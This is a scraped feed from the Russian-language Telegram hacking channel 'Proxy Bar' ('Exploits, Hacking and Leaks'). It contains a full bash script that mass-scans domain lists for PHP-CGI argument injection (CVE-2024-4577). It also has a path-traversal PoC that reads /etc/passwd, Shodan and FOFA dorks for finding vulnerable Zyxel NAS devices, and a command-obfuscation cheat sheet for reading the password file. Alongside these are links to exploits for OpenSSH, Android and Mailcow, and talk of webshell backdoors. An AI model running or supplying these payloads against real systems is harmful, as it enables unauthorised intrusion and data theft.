Proxy Bar – Telegram
Proxy Bar
19.5K subscribers
1.29K photos
76 videos
664 files
1.32K links
Exploits, Hacking and Leaks

Чат группы - https://news.1rj.ru/str/chat_proxy_bar

Связь с администрацией и реклама:
@NULL_vm

Поддержать проект:
BTC bc1qmrt229eghjyj9wqa7nmr9j8zuq6khz6km2pker
Download Telegram
CVE-2024-4577 Argument Injection in PHP-CGI
ДОПОЛНЕНИЕ к предыдущему посту
BASH:
#!/bin/bash

# Function to check vulnerability for a domain
check_vulnerability() {
local domain=$1
local response=$(curl -s -X POST "${domain}/test.php?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input" \
-H "User-Agent: curl/8.3.0" \
-H "Accept: */*" \
-H "Content-Length: 23" \
-H "Content-Type: application/x-www-form-urlencoded" \
-H "Connection: keep-alive" \
--data "<?php phpinfo(); ?>" \
--max-time 10)

if [[ $response == *"PHP Version"* ]]; then
echo "$domain: Vulnerable"
fi
}

# Main function to iterate over domains
main() {
local file=$1
while IFS= read -r domain || [ -n "$domain" ]; do
check_vulnerability "$domain"
done < "$file"
}

# Check if the file argument is provided
if [ "$#" -ne 1 ]; then
echo "Usage: $0 <domain_list_file>"
exit 1
fi

# Call the main function with the domain list file
main "$1"


*
Сохраняйте скрипт и по списку доменов:
./CVE-2024-4577_noscript.sh /path/to/domains-list

#php #xamp
🔥12
This media is not supported in your browser
VIEW IN TELEGRAM
DDOS для самых маленьких

#pic
🔥62👍14😱2
😱8
CVE-2024-30078.poc
2.9 KB
🔥22👍7😱2
How To Harden Active Directory To Prevent Cyber Attacks
Вебинар
PDF
Не поленитесь открыть PDF, можно даже не читать, картинки ТОП.

#ad #sec
👍14🔥7
BYPASS

cat ${HOME:0:1}etc${HOME:0:1}passwd

`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`

cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

cat `xxd -r -ps <(echo 2f6574632f706173737764)`
🔥30😱14👍8
Вчера на ночь глядя стукнула мысль, как бы реализовать редирект юзера в зависимости от правильно\неправильно был дан ответ на http basic authentication (который на nginx).
Ну то есть если логин\пароль верный - отправило на правильный сайт.
логин\пароль не верный - юзер ушел на страницу сбора данных (разрешение экрана, вебка и тд). ну или просто в лог писать.
Добрый гугл сказать соединить nginx + LUA.
После слова Lua я про первую мысль как то подзабыл.
Варианта три:
1 - собрать руками джинс + луа
2 - докер
3 - OpenResty
Сам по себе Lua открывает тонну возможностей для хороших и не очень😝 целей.
Как минимум можно получать webshell просто описав vhost (самый обычный nginx + пара строк на Lua) ну или получать полноценный lua cli
Оказвается нормальные пацаны уже сделали, гит ломится от решений.
Почитайте короткую статейку )
Backdooring OpenResty Servers

#ЯбудуЗватьТебяЛУ #nginx
🔥14👍3
CVE-2024-34470 HSC MailInspector
*
POC:
GET /mailinspector/public/loader.php?path=../../../../../../../etc/passwd

FOFA:
noscript=="..:: HSC MailInspector ::.."
👍19
CVE-2024-28397 js2py
sandbox escape, bypass pyimport restriction
*
POC + fix

#python #js #poc
🔥7😱2
Не ну, why not ?)
я так понимаю docker RCE
CVSS Score: 146 %
👍29🔥8😱7
Gimmick
*
Section-based payload obfuscation technique for x64
*
download
👍7🔥4
CVE 2024 0044
*
Дырка в Android 12 и 13. Уязвимость позволяет злоумышленнику выполнить атаку «запуск от имени любого приложения», что приводит к локальное повышение привилегий без вмешательства пользователя
*
exploit

#android
😱18🔥6👍5
CVE-2024-29973 Unauth inject Zyxel NAS
*
SHODAN: http.noscript:"Zyxel NAS326"
FOFA: app="NAS542" || app="ZYXEL-NAS326"
*
exploit

#nas #zyxel
🔥28👍1😱1
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-4577 PHP CGI Remote Code Execution
*
writeUP

для версий:
PHP 8.3 < 8.3.8
PHP 8.2 < 8.2.20
PHP 8.1 < 8.1.29
*
POC

#php #rce
🔥18👍2
CVE-2024-30270
*
Дырка в почтовом сервере с открытым исходным кодом Mailcow.
CVSS: 6,7

Связана с обходом пути, затрагивая функцию rspamd_maps(), которая может привести к выполнению произвольных команд на сервере, позволяя злоумышленнику перезаписать любой файл.
*
exploit

#mail
👍18🔥6😱3
+
😱73👍14🔥8
This media is not supported in your browser
VIEW IN TELEGRAM
CVE-2024-29943
*
Ошибка JIT Pwn2Own SpiderMonkey
*
POC exploit
👍13🔥6
cve-2024-6387-poc.zip
21.1 KB
CVE-2024-6387: Критическая уязвимость OpenSSH без аутентификации RCE «regreSSHion»
*
Почитать
*
🔥40
Forwarded from Life-Hack - Хакер
Подведем итоги нашего бесплатного курса "OSINT для новичков". В рамках курса были изучены фундаментальные основы поиска по открытым источникам (Open-Source Intelligence) и инструменты для автоматизации этого процесса. Также были рассмотрены специальные сервисы для сбора данных, часть из которых уже достаточно известна в кругах специалистов, а часть знакома лишь единицам и стремительно набирает популярность. Этот курс поможет вам понять важность защиты данных и конфиденциальности.

Если вы что-то пропустили и желаете прочитать, то вот список пройденых материалов:

Первая серия материалов - "Введение в OSINT":
Введение в OSINT
Стороны, заинтересованные в OSINT информации
Типы сбора информации
Преимущества и проблемы OSINT
Правовые и этические ограничения
Цифровой след
Google Dorking

Вторая серия материалов - "OSINT инструменты":
Хакерские поисковые системы.
OSINT на платформе Telegram.
OSINT: theHarvester и HaveIbeenPwned.
OSINT: Snoop, GHunt, ReconSpider.
OSINT: Поиск по фото.
Инструменты для OSINT в VKontakte и YouTube.
OSINT: Отслеживание транспорта

Не забывайте делиться нашим бесплатным курсом "OSINT для новичков"!

P.S.: Подборки полезных материалов, которые мы любезно собрали специально для вас:
• OSINT подборка №1
• OSINT подборка №2
• OSINT подборка №3

P.P.S.: Ещё немного полезного по теме OSINT:
OSINT collection.
Remini: Инструмент размытия/повышения резкости изображения может помочь получить лучший результат обратного поиска изображений и распознавания лиц.
Cleanup.Pictures: Один из лучших онлайн-инструментов для удаления фотообъектов, которые я когда-либо видел.
Как «пробить» человека в Интернете: используем операторы Google и логику
Red Team Trickery.
История одного наследства: как я с помощью OSINT и социальной инженерии заскамил скамера.

Приватный клуб единомышленников, по всем вопросам вступления в клуб писать сюда.

#OSINT #обучениеOSINT #статья

LH | Новости | Курсы | Мемы
👍14🔥5